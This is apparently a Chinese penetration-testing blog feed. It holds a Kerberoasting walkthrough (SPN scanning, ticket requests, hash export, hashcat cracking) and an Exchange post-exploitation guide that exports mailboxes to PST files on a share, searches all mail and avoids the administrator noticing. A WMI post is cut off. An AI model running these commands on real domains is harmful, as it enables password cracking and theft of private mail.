<entry>
<title><![CDATA[SPNs]]></title>
<url>/2017/11/01/SPNs/</url>
<content type="html"><![CDATA[<p>首先了解一下Kerberos认证协议</p>
<p>Kerberos Overview & Communication Process:</p>
<p><img src="https://www.ibm.com/developerworks/cn/data/library/techarticles/dm-0809govindarajan/image001.gif" alt=""></p>
<p>KDC(Key Distribution Center)有两个服务组成:身份验证服务(Authentication Server,简称AS)和票据授予服务(Ticket Granting Server,简称TGS)。</p>
<p>User logs on with username & password.</p>
<p>客户端认证</p>
<ol>
<li>客户端将用户id明文消息发送到AS。</li>
<li>AS返回使用客户端用户密码加密的会话密钥session key和使用krbegt密码加密的TGT。</li>
<li>客户端使用用户密码解密消息获得会话密钥,该会话密钥用于与TGS的进一步通信。</li>
</ol>
<p>客户服务授权</p>
<ol>
<li>客户端发送TGT和用Client/TGS会话密钥加密的认证器。</li>
<li>TGS解密TGT获得会话密钥并用此密钥解密认证器,如果id匹配则返回使用服务密码加密的客户端到服务器的票据和使用Client/TGS会话密钥加密的客户端/服务器会话密钥session key2。</li>
</ol>
<p>客户服务请求</p>
<ol>
<li>客户端发送一个用session key2加密的新的Authenticator和服务票据。</li>
<li>服务器用自己密码解密服务票据并提供服务。</li>
</ol>
<h3 id="Service-Principal-Names"><a href="#Service-Principal-Names" class="headerlink" title="Service Principal Names"></a>Service Principal Names</h3><p>服务主体名称 (SPN) 是服务实例的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务登录帐户相关联。以为MSSQL服务配置SPN为例。<br><a href="https://technet.microsoft.com/zh-cn/library/bb735885.aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb735885.aspx</a></p>
<a id="more"></a>
<p>S1. 为 SQL Server 服务帐户注册SPN。</p>
<p>手动注册<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com:1433 accountname<br>对于命名实例<br>setspn -A MSSQLSvc/myhost.redmond.microsoft.com/instancename accountname </p>
<p>查看用户对应的SPN<br><code>setspn -L ruos\sql-service</code></p>
<p>使用ADSI(adsiedit.msc)查看用户属性</p>
<p><img src="https://i.imgur.com/bayB8a4.png" alt=""></p>
<p>S2. 在AD上为用户指定服务登陆权限。</p>
<p>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\User Rights Assignment<br>Log on as a service</p>
<p><img src="https://i.imgur.com/8o7zha7.png" alt=""></p>
<p>S3. 更改 SQL Server 服务帐户为域用户帐户。</p>
<h3 id="暴力破解Kerberos-TGS-Tickets"><a href="#暴力破解Kerberos-TGS-Tickets" class="headerlink" title="暴力破解Kerberos TGS Tickets"></a>暴力破解Kerberos TGS Tickets</h3><p>由于加密类型是RC4_HMAC_MD5,Kerberos协议第四步TGS-REP将会返回用服务帐户的NTLM密码哈希加密的票据。</p>
<p>S1. SPN扫描</p>
<p><code>setspn -T domain -q */*</code></p>
<p>或者<br><a href="https://github.com/PyroTek3/PowerShell-AD-Recon/" target="_blank" rel="external">https://github.com/PyroTek3/PowerShell-AD-Recon/</a></p>
<p><img src="https://i.imgur.com/56AHj7q.png" alt=""></p>
<p>S2. 请求SPN Kerberos Tickets<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">PS C:\> <span class="built_in">Add-Type</span> -AssemblyName System.IdentityModel</div><div class="line">PS C:\> <span class="built_in">New-Object</span> System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList <span class="string">"MSSQLSvc/WEBTST01.ruos.org/SQLEXPRESS"</span></div></pre></td></tr></table></figure></p>
<p>S3. 查看并导出票据</p>
<p><img src="https://i.imgur.com/qvvPXcA.png" alt=""></p>
<blockquote>
<p>默认配置加密类型是aes256_hmac,tgsrepcrack无法破解,可在服务器组策略指定加密类型为RC4_HMAC_MD5。<br>GPO_name\Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options<br>Network security: Configure encryption types allowed for Kerberos</p>
</blockquote>
<p>S4. 离线破解</p>
<p>tgsrepcrack(仅对RC4_HMAC_MD5),或者保存hash使用hashcat破解。</p>
<p><img src="https://i.imgur.com/o8WPRlS.png" alt=""></p>
<p>S1.导出hash(用于其他加密类型)<br>GetUserSPNs.py -request -outputfile hash.txt -dc-ip 192.168.6.2 ruos.org/user2<br>或者从票据中导出 kirbi2john.py 1-40a00000-user2@MSSQLSvc~WEBTST01.ruos.org~SQLEXPRESS-RUOS.ORG.kirbi<br>S2. hashcat64.exe -m 13100 hash.txt example.dict –force</p>
<p><a href="https://github.com/nidem/kerberoast" target="_blank" rel="external">https://github.com/nidem/kerberoast</a><br><a href="https://github.com/coresecurity/impacket" target="_blank" rel="external">https://github.com/coresecurity/impacket</a><br><a href="https://github.com/nidem/kerberoast/blob/master/kirbi2john.py" target="_blank" rel="external">https://github.com/nidem/kerberoast/blob/master/kirbi2john.py</a></p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p><a href="https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx" target="_blank" rel="external">https://msdn.microsoft.com/zh-cn/library/windows/apps/dn194200(v=sql.110).aspx</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[域渗透之Exchange Server]]></title>
<url>/2017/07/27/exchange%20server/</url>
<content type="html"><![CDATA[<p><img src="https://i-technet.sec.s-msft.com/Areas/Epx/Themes/TechNet/Content/Images/BrandLogoExchange.png?v=636437933426396895" alt=""></p>
<blockquote>
<p>Microsoft Exchange Server 做为消息与协作系统。它提供了业界最强的扩展性、高可靠性、安全性和高处理性能,被许多企业、学校、政府等作为主要邮件系统。在内网渗透测试中,对邮件系统的把控会让你事半功倍,尤其是和AD绑在一起的Exchange。</p>
</blockquote>
<p>通过本文你将了解Ps下对Exchange邮件的基本操作,这也同样适用于运维管理,当然相比博大精深的ES是远远不够的。以下环境为Exchange server 2013,也同样适用于2010等版本。</p>
<p>你可以在开始菜单中通过 Exchange Management Shell (EMS)管理器快捷方式连接到 exchange server,初始化过后你将得到一个Powershell命令窗口。如果连接失败,请相信我,一定是你内存分配的不够,默认安装的Exchange也至少需要分配6个G内存。</p>
<p>如果一切都没有问题,并且你已经获取了域控权限,那就开始我们的旅程吧!</p>
<a id="more"></a>
<h2 id="导出邮箱列表"><a href="#导出邮箱列表" class="headerlink" title="导出邮箱列表"></a>导出邮箱列表</h2><h4 id="查看数据库"><a href="#查看数据库" class="headerlink" title="查看数据库"></a>查看数据库</h4><p>邮箱数据库是创建和存储邮箱的粒度的单位。邮箱数据库以 Exchange 数据库 (.edb) 文件的形式存储。存储结构分为直接附加存储 (DAS)和存储区域网络 (SAN)。我们可以通过 Get-MailboxDatabase cmdlet 从服务器或组织中检索一个或多个邮箱数据库对象。一般为了高可用性至少有两台服务器组成DGA,你可以通过-Server参数指定检索服务器。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxdatabase -Server "exchange"</div><div class="line"></div><div class="line">Name Server Recovery ReplicationType</div><div class="line">---- ------ -------- ---------------</div><div class="line">Mailbox Database 0574336487 EXCHANGE False None</div><div class="line">Mailbox Database Test01 EXCHANGE False None</div></pre></td></tr></table></figure></p>
<p>格式化筛选指定属性,如数据库文件路径<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\>Get-MailboxDatabase -Identity 'Mailbox Database Test01' | Format-List Name,EdbFilePath,LogFolderPath</div><div class="line"></div><div class="line">Name : Mailbox Database Test01</div><div class="line">EdbFilePath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01\Mailbox Database Test01.edb</div><div class="line">LogFolderPath : C:\Program Files\Microsoft\Exchange Server\V15\Mailbox\Mailbox Database Test01</div></pre></td></tr></table></figure></p>
<p>ECP数据库管理位置</p>
<p><img src="http://i.imgur.com/JT1pMQf.png" alt=""></p>
<h4 id="获取组"><a href="#获取组" class="headerlink" title="获取组"></a>获取组</h4><p>在域控中新建过OU(Organizational Unit)之后,我们往往会建立Group来管理用户。查询组的意义在于——往往你会看到有个组名字叫做IT,当然这一步和net group大同小异。通过Get-DistributionGroup cmdlet 查询现有通讯组。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup</div><div class="line"></div><div class="line">Name DisplayName GroupType PrimarySmtpAddress</div><div class="line">---- ----------- --------- ------------------</div><div class="line">EXchange New OU EXchange New OU Universal ENO@ruos.org</div><div class="line">IT Security IT Security Universal, SecurityEnabled it-security@ruos.org</div></pre></td></tr></table></figure></p>
<p>查看通讯组IT Security详细信息<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroup "IT Security" | fl</div><div class="line"></div><div class="line"></div><div class="line">RunspaceId : efbb60f9-5ef1-4a8d-9b94-c3f102e576c3</div><div class="line">GroupType : Universal, SecurityEnabled</div><div class="line">SamAccountName : IT Security</div><div class="line">BypassNestedModerationEnabled : False</div><div class="line">ManagedBy : {ruos.org/Users/Administrator, ruos.org/Users/admin}</div><div class="line">MemberJoinRestriction : Closed</div><div class="line">MemberDepartRestriction : Closed</div><div class="line">...</div></pre></td></tr></table></figure></p>
<p>导出成CSV文件<br><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查询通讯组</span></div><div class="line">Get-DistributionGroup | `</div><div class="line"><span class="built_in">Select-Object</span> DisplayName,Name,Alias,GroupType,WindowsEmailAddress,@{n=<span class="string">"ManagedBy"</span>;e={<span class="variable">$_</span>.ManagedBy -Join <span class="string">";"</span>}} ,OrganizationalUnit | `</div><div class="line"><span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure></p>
<h4 id="获得组成员"><a href="#获得组成员" class="headerlink" title="获得组成员"></a>获得组成员</h4><p>通过Get-DistributionGroupMember cmdlet 可以查找现有的通讯组成员。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-DistributionGroupMember -Identity "ENO"</div><div class="line"></div><div class="line">Name RecipientType</div><div class="line">---- -------------</div><div class="line">Administrator UserMailbox</div><div class="line">a UserMailbox</div><div class="line">ming xiao UserMailbox</div><div class="line">user1 UserMailbox</div></pre></td></tr></table></figure></p>
<h4 id="获得用户admin(可以是域用户格式)邮箱信息"><a href="#获得用户admin(可以是域用户格式)邮箱信息" class="headerlink" title="获得用户admin(可以是域用户格式)邮箱信息"></a>获得用户admin(可以是域用户格式)邮箱信息</h4><p>获取用户邮箱信息。通过以上步骤,我们大概知道了如何查询用户组中的成员,下面我们将使用Get-Mailbox cmdlet 获取邮箱对象和属性。再配合Get-MailboxStatistics cmdlet 获取有关邮箱的信息,例如,邮箱大小、所包含的邮件数、以及最后访问时间。</p>
<p>基本使用<br>Get-Mailbox | format-tables Name,WindowsEmailAddress<br>Get-Mailbox testuser | fl * | Out-File c:\mb.txt<br>Get-Mailbox | ForEach-Object {$_.Name}</p>
<p>获取组织单元内用户<br>Get-Mailbox -OrganizationalUnit “New OU”<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>get-mailboxstatistics -identity admin | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime</div><div class="line"></div><div class="line">DisplayName ItemCount TotalItemSize LastLogonTime</div><div class="line">----------- --------- ------------- -------------</div><div class="line">admin 11 90.88 KB (93,056 bytes) 2016/11/29 19:59:08</div></pre></td></tr></table></figure></p>
<p>Format-Table 模式查看</p>
<blockquote>
<p>使用反引号`换行,输入结束后再回车执行。</p>
</blockquote>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查看所有邮箱信息</span></div><div class="line">Get-Mailbox -ResultSize Unlimited | `</div><div class="line">Get-MailboxStatistics | `</div><div class="line"><span class="built_in">Sort-Object</span> TotalItemSize –Descending | `</div><div class="line">ft DisplayName,@{label=<span class="string">"Mailbox Size (MB)"</span>;expression={<span class="variable">$_</span>.TotalItemSize.Value.ToMB()}</div></pre></td></tr></table></figure>
<p>导出到CSV文件(这将是你想要的)</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$mb</span> = Get-Mailbox -ResultSize Unlimited</div><div class="line"><span class="variable">$output</span> = <span class="keyword">foreach</span>(<span class="variable">$obj</span> <span class="keyword">in</span> <span class="variable">$mb</span> ){</div><div class="line"> <span class="variable">$ms</span> = (Get-MailboxStatistics <span class="variable">$obj</span>.Identity -WarningAction SilentlyContinue )</div><div class="line"> <span class="variable">$obj</span> | <span class="built_in">Select-Object</span> DisplayName,Name,WindowsEmailAddress,OrganizationalUnit,Database,`</div><div class="line"> @{L=<span class="string">"Mailbox Size (MB)"</span>;E={ <span class="variable">$ms</span>.TotalItemSize.Value.ToMB() }},`</div><div class="line"> @{L=<span class="string">"LastLogonTime"</span>;E={ <span class="variable">$ms</span>.LastLogonTime }}</div><div class="line">}</div><div class="line"><span class="variable">$output</span> | <span class="built_in">Export-CSV</span> test.csv -NoType</div></pre></td></tr></table></figure>
<p>或者通过ECP导出</p>
<p><img src="http://i.imgur.com/N1mmgDy.jpg" alt=""></p>
<h2 id="导出PST邮件"><a href="#导出PST邮件" class="headerlink" title="导出PST邮件"></a>导出PST邮件</h2><p>在了解了用户的邮箱使用情况后,我们下一步将邮箱数据导出为PST文件,以方便本地查看和搜索。<br><strong>要在Exchange Server 2010 SP1中使用用户邮箱导出功能,只能使用EMS进行操作。而且操作的Exchange服务器管理员必须要成为“邮箱导入导出角色”。</strong></p>
<blockquote>
<p>Exchange Server 2007 可以使用 export-Mailbox cmdlet </p>
</blockquote>
<p>导出邮件分为以下几个步骤:</p>
<ul>
<li>Step1 为用户添加导出权限</li>
<li>Step2 导出邮件</li>
<li>Step3 查看导出请求及删除导出请求</li>
</ul>
<h4 id="查看角色(默认只有组织管理成员才有导入-导出权限)"><a href="#查看角色(默认只有组织管理成员才有导入-导出权限)" class="headerlink" title="查看角色(默认只有组织管理成员才有导入/导出权限)"></a>查看角色(默认只有组织管理成员才有导入/导出权限)</h4><p>使用Get-ManagementRole cmdlet 查看组织内已创建的管理角色。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRole</div><div class="line"></div><div class="line">Name RoleType</div><div class="line">---- --------</div><div class="line">Mailbox Import Export MailboxImportExport</div></pre></td></tr></table></figure></p>
<p>Get-ManagementRoleAssignment cmdlet 检索管理角色分配。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-ManagementRoleAssignment -role "Mailbox Import Export" | Format-List RoleAssigneeName</div><div class="line"></div><div class="line">RoleAssigneeName : Organization Management</div><div class="line"></div><div class="line">RoleAssigneeName : Administrator</div></pre></td></tr></table></figure></p>
<h4 id="为用户Administrator添加邮箱导入导出角色"><a href="#为用户Administrator添加邮箱导入导出角色" class="headerlink" title="为用户Administrator添加邮箱导入导出角色"></a>为用户Administrator添加邮箱导入导出角色</h4><p>New-ManagementRoleAssignment cmdlet 可以将管理角色分配给管理角色组、管理角色分配策略、用户或通用安全组 (USG)。</p>
<blockquote>
<p>添加角色后需要重启EMS</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>New-ManagementRoleAssignment -Name "Import Export_Domain Admins" `</div><div class="line">>>-User "Administrator" -Role "Mailbox Import Export"</div><div class="line">>></div><div class="line"></div><div class="line">DataObject : Import Export_Domain Admins</div><div class="line">User : ruos.org/Users/Administrator</div><div class="line">AssignmentMethod : Direct</div><div class="line">Identity : Import Export_Domain Admins</div><div class="line">EffectiveUserName : Administrator</div></pre></td></tr></table></figure>
<p>删除管理角色分配</p>
<p><code>Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false</code></p>
<h4 id="New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。"><a href="#New-MailboxExportRequest-cmdlet-将主邮箱或存档的内容导出到-pst-文件。" class="headerlink" title="New-MailboxExportRequest cmdlet 将主邮箱或存档的内容导出到 .pst 文件。"></a>New-MailboxExportRequest cmdlet 将主邮箱或存档的内容导出到 .pst 文件。</h4><p>net share 创建“读/写权限”共享文件夹</p>
<p><code>net share sharename$=c:\share /GRANT:Everyone,FULL</code></p>
<p>将user1收件箱中的所有邮件导出到 .pst </p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox user1 -IncludeFolders <span class="string">"#Inbox#"</span> -FilePath \\<span class="number">10.2</span>.<span class="number">2.163</span>\maildata\user1.pst</div></pre></td></tr></table></figure>
<blockquote>
<p>Inbox(收件箱)、SentItems(已发送邮件)、DeletedItems(已删除邮件)、Drafts(草稿)</p>
</blockquote>
<p>导出用户 Tony 在 2012 年 1 月 1 日之前收到的邮件正文中包含“公司”和“利润”的邮件。 </p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">New-MailboxExportRequest -Mailbox Tony `</div><div class="line">-ContentFilter {(body <span class="nomarkup">-like</span> <span class="string">"*company*"</span>) `</div><div class="line">-and (body <span class="nomarkup">-like</span> <span class="string">"*profit*"</span>) `</div><div class="line">-and (Received <span class="nomarkup">-lt</span> <span class="string">"01/01/2012"</span>)} `</div><div class="line">-FilePath <span class="string">"\\SERVER01\PSTFileShare\Tony_CompanyProfits.pst"</span></div></pre></td></tr></table></figure>
<p>之后你可以将其载入到Outlook中进行查看。</p>
<h4 id="查看导出请求状态"><a href="#查看导出请求状态" class="headerlink" title="查看导出请求状态"></a>查看导出请求状态</h4><p>Get-MailboxExportRequest cmdlet 可以查看使用 New-MailboxExportRequest cmdlet 启动的正在执行的导出请求的详细状态。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">[PS] C:\Windows\system32>Get-MailboxExportRequest</div><div class="line"></div><div class="line">Name Mailbox Status</div><div class="line">---- ------- ------</div><div class="line">MailboxExport ruos.org/Users/a Completed</div></pre></td></tr></table></figure></p>
<h4 id="删除全部或部分完成的导出请求"><a href="#删除全部或部分完成的导出请求" class="headerlink" title="删除全部或部分完成的导出请求"></a>删除全部或部分完成的导出请求</h4><p><code>[PS] C:\Windows\system32>Remove-MailboxExportRequest -Identity "a\MailboxExport"</code></p>
<p>删除所有状态为“已完成”的导出请求</p>
<p><code>Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest -Confirm:$false</code></p>
<p>或者通过ECP导出,缺点是不能过滤时间,并且管理员会收到导出完成通知。</p>
<p><img src="http://i.imgur.com/L24RI8O.jpg" alt=""></p>
<p>以上介绍了如何通过EMS导出用户邮件,但是谁也不能保证你不会和管理员撞个满怀。值得庆幸的是,Exchange Server支持PowerShell远程操作。</p>
<h2 id="Exchange-PowerShell"><a href="#Exchange-PowerShell" class="headerlink" title="Exchange PowerShell"></a>Exchange PowerShell</h2><p>远程 PowerShell 提供了从命令行管理 Exchange Online的方式,利人又利己。</p>
<h4 id="创建用户凭证"><a href="#创建用户凭证" class="headerlink" title="创建用户凭证"></a>创建用户凭证</h4><p><code>$Credential = Get-Credential</code></p>
<p>但这样会弹出凭据请求输入框,使用 PSCredential 创建非交互式登陆凭据。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$pass</span> = <span class="built_in">ConvertTo-SecureString</span> <span class="string">"PlainTextPassword"</span> -AsPlainText -Force</div><div class="line"><span class="variable">$Credential</span> = <span class="built_in">New-Object</span> System.Management.Automation.PSCredential (<span class="string">"Domain01\User01"</span>, <span class="variable">$pass</span>)</div></pre></td></tr></table></figure>
<h4 id="创建登陆会话"><a href="#创建登陆会话" class="headerlink" title="创建登陆会话"></a>创建登陆会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="variable">$Session</span> = <span class="built_in">New-PSSession</span> -ConfigurationName Microsoft.Exchange `</div><div class="line">-ConnectionUri http://<FQDN of Exchange <span class="number">2016</span> Mailbox server>/PowerShell/ `</div><div class="line">-Authentication Kerberos -Credential <span class="variable">$Credential</span></div></pre></td></tr></table></figure>
<h4 id="导入会话"><a href="#导入会话" class="headerlink" title="导入会话"></a>导入会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Import-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure>
<h4 id="移除会话"><a href="#移除会话" class="headerlink" title="移除会话"></a>移除会话</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="built_in">Remove-PSSession</span> <span class="variable">$Session</span></div></pre></td></tr></table></figure>
<h2 id="Scripting-with-the-Exchange-Management-Shell"><a href="#Scripting-with-the-Exchange-Management-Shell" class="headerlink" title="Scripting with the Exchange Management Shell"></a>Scripting with the Exchange Management Shell</h2><p>通过SHELL的方式执行脚本。<br>适用于: Exchange Server 2013</p>
<p>exchange默认根目录在 <root drive="">:\Program Files\Microsoft\Exchange Server\V15\bin</root></p>
<h4 id="执行自定义脚本"><a href="#执行自定义脚本" class="headerlink" title="执行自定义脚本"></a>执行自定义脚本</h4><p>需要开启远程脚本执行权限</p>
<p><code>Set-ExecutionPolicy RemoteSigned</code></p>
<p>Script</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># filename:test.ps1</span></div><div class="line"><span class="comment"># export to pst</span></div><div class="line"><span class="keyword">foreach</span>(<span class="variable">$user</span> <span class="keyword">in</span> <span class="string">"admin"</span>,<span class="string">"user1"</span>,<span class="string">"user2"</span>){</div><div class="line"> New-MailboxExportRequest -Mailbox <span class="variable">$user</span> -ContentFilter { Received <span class="nomarkup">-gt</span> <span class="string">"11/29/2016"</span> } -FilePath <span class="string">"\\192.168.6.2\sharename<span class="variable">$\$</span>user.pst"</span></div><div class="line"> <span class="built_in">Start-Sleep</span> -Seconds <span class="number">3</span></div><div class="line">}</div></pre></td></tr></table></figure>
<p>从cmd启动脚本</p>
<blockquote>
<p>64位系统下存在文件系统重定向机制,powershell路径为 C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe</p>
</blockquote>
<p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; C:\test.ps1"</code></p>
<p>or </p>
<p>查看角色权限</p>
<p><code>PowerShell.exe -command ". 'C:\Program Files\Microsoft\Exchange Server\V15\bin\RemoteExchange.ps1'; Connect-ExchangeServer -auto; Get-ManagementRoleAssignment -role \"Mailbox Import Export\""</code></p>
<h2 id="邮件搜索-Search-Mailbox"><a href="#邮件搜索-Search-Mailbox" class="headerlink" title="邮件搜索 Search-Mailbox"></a>邮件搜索 Search-Mailbox</h2><p>Step 1: 将用户加入Organization Manageme组,并为指派角色</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">net group "Organization Manageme" admin /add /domain</div><div class="line">[PS] C:\>New-ManagementRoleAssignment -Role "Mailbox Import Export" -User admin</div><div class="line"># 添加到组 Discovery Management</div><div class="line">[PS] C:\>Add-RoleGroupMember -Identity "Discovery Management" -Member admin</div></pre></td></tr></table></figure>
<p>Step 2: 创建发现搜索邮箱<br><code>New-Mailbox -Name SearchResults -Discovery</code></p>
<p>设置发现邮箱在地址列表中可见<br><code>Set-Mailbox -Id SearchResults -HiddenFromAddressListsEnabled $false</code></p>
<p>查看发现搜索邮箱<br><code>Get-Mailbox -Resultsize unlimited -Filter {RecipientTypeDetails -eq "DiscoveryMailbox"}</code></p>
<p>Step 3: 指定admin用户对搜索邮箱的完全访问<br><code>Add-MailboxPermission SearchResults -User admin -AccessRights FullAccess -InheritanceType all</code></p>
<p>Step 4: 搜索邮件</p>
<p>搜索包含key1或key2关键字,在18年5月4号之后的并且不包含发件人hr的邮件。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 查看结果</span></div><div class="line">[PS] C:\>Search-Mailbox -Identity <span class="string">"test"</span> -SearchQuery <span class="string">'(key1 OR key2) AND Received>05/04/2018 NOT From:hr@ruos.org'</span> -EstimateResultOnly</div><div class="line"></div><div class="line">[PS] C:\>Get-Mailbox -ResultSize Unlimited |</div><div class="line">Search-Mailbox -SearchQuery <span class="string">'(key1 OR key2) AND Received:05/01/2018..05/08/2018'</span> `</div><div class="line">-DoNotIncludeArchive `</div><div class="line">-TargetMailbox <span class="string">"SearchResults"</span> `</div><div class="line">-TargetFolder <span class="string">"Results"</span> `</div><div class="line">-LogLevel Suppress</div></pre></td></tr></table></figure>
<p>在test邮箱中打开搜索邮箱</p>
<p><img src="https://i.imgur.com/fv4mOuF.png" alt=""></p>
<h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>Exchange和AD的紧密性使得很多Cmdlet Reference都能达到同样的目的,比如查询用户登陆的源IP地址,我们还能通过Exchange的IIS日志来查找。但有时候遗憾的是,用户虽然在使用邮箱,工作机却没有加入域中。这种情况我们就需要配合其他信息进一步确认。</p>
<p><img src="http://i.imgur.com/f0rIlU4.png" alt=""></p>
<p>参考资料</p>
<p><a href="https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/mt587043(v=exchg.150).aspx</a><br><a href="https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx" target="_blank" rel="external">https://technet.microsoft.com/zh-cn/library/bb124558(v=exchg.150).aspx</a><br><a href="https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx" target="_blank" rel="external">https://msdn.microsoft.com/en-us/library/hh770397(v=exchsrvcs.149).aspx</a><br>Microsoft Exchange Server 2013 PowerShell Cookbook</p>
<p><a href="http://blog.51cto.com/msftuc/1660885" target="_blank" rel="external">http://blog.51cto.com/msftuc/1660885</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[WMI]]></title>
<url>/2017/02/08/WMI/</url>
<content type="html"><![CDATA[<h3 id="WMI-管理规范"><a href="#WMI-管理规范" class="headerlink" title="WMI 管理规范"></a>WMI 管理规范</h3><p>术语</p>
<ul>
<li>CIM - Common Information Model – this is the premier concept of WBEM by this model WMI stores the Managed objects data (namespace, classes, methods, properties etc.). </li>
<li>CIM Repository – This is the storage that holds the Managed objects data. The structure of the CIM repository is build upon the DMTF. </li>
<li>CIMOM - Common Information Model object manager. The CIM repository is managed by the CIMOM, which acts as an agent for object requests. The CIMOM tracks available classes and determines which provider is responsible for supplying instances of these classes.. </li>
<li>DMTF - Distributed Management Task Force – The DMTF consortium was founded in May of 1992. This initiative was conceived and created by eight companies like: BMC Software Inc., Cisco Systems Inc., Compaq Computer Corp., Intel Corp., and Microsoft Corp. etc. The aims of this consortium are to define industry standards for management.</li>
<li>MIB – Management Information Base describes a set of managed objects. Each managed object in a MIB has a unique identifier.</li>
<li>MOF - Managed Object Format. This text file includes the class definition of on or more managed object. You can export and import this definition from the CIM repository by using the WMI CIM Studio.</li>
<li>Schema - a group of classes that describe a particular management environment.</li>
